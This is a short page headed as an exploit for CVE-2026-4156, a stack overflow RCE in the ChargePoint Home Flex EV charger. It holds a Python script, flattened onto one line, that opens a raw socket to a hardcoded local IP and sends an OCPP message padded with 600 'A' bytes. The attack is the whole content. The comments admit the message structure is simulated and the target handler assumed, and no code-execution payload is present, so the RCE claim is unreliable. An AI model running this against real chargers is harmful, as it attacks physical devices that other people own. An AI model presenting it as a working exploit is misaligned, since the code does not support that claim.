CVE-2026-4156 ChargePoint Home Flex OCPP栈溢出RCE漏洞

import socket # Target IP of the ChargePoint Home Flex target_ip = "192.168.1.10" target_port = 80 # Typical port for OCPP over WebSocket # Generate payload to trigger Stack-based Buffer Overflow # The specific length depends on the buffer size, this is an example buffer_size = 600 payload = b"A" * buffer_size # Construct malicious OCPP message (Simulated structure) # Assuming the vulnerability is triggered in the 'getpreq' handler malicious_msg = b"[2,\"unique_id\",\"GetPreReq\",{\"data\":\"" + payload + b"\"}]" try: # Establish connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Send malicious payload s.send(malicious_msg) print("[+] Payload sent successfully.") s.close() except Exception as e: print(f"[-] Error: {e}")